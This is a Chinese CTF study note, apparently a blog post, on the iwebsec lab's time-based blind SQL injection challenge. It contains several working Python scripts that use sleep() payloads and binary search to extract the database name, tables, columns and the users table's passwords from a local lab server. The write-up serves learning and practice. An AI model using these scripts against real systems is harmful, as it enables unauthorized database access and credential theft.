CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入

一、解题过程

(一)观察页面

发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入

(二)编写脚本逐项获取数据

1.获取数据库名的长度(可不做)

#encoding=utf-8
import requests
import os
import time

url="http://192.168.182.130:8001/sqli/04.php"

def DbLen():
	for i in range(1,10):
		payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
		req_url=url+payload
		start_time=time.time()
		rep=requests.get(url=req_url)
		end_time = time.time()
		t = end_time - start_time
		if t > 1:
			print("DB length is "+str(i))
DbLen()

在这里插入图片描述

2.获取数据库名(可不做)

def DbName():
	result=""
	for i in range(1,8):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
DbName()

在这里插入图片描述

3.获取表名

def TablesName():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(table_name) 
			from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
TablesName()

在这里插入图片描述

4.获取users表的列名

def ColumnsName():
	result=""
	for i in range(1,30):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload='''?id=if(ord(mid((select group_concat(column_name) 
				from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
ColumnsName()

在这里插入图片描述

5.获取password列的数据

def GetData():
	result=""
	for i in range(1,50):
		l = 32
		r = 130
		mid = (l + r) >> 1
		while (l < r):
			payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)			
			req_url=url+payload
			#print(req_url)
			start_time=time.time()
			rep=requests.get(url=req_url)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				l = mid +1
			else:
				r = mid
			mid = (l + r)>>1
		result=result+chr(mid)
		print("the result is {}".format(result))
GetData()

在这里插入图片描述

二、源码分析

(一)php源码

在这里插入图片描述

(二)脚本关键部分

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值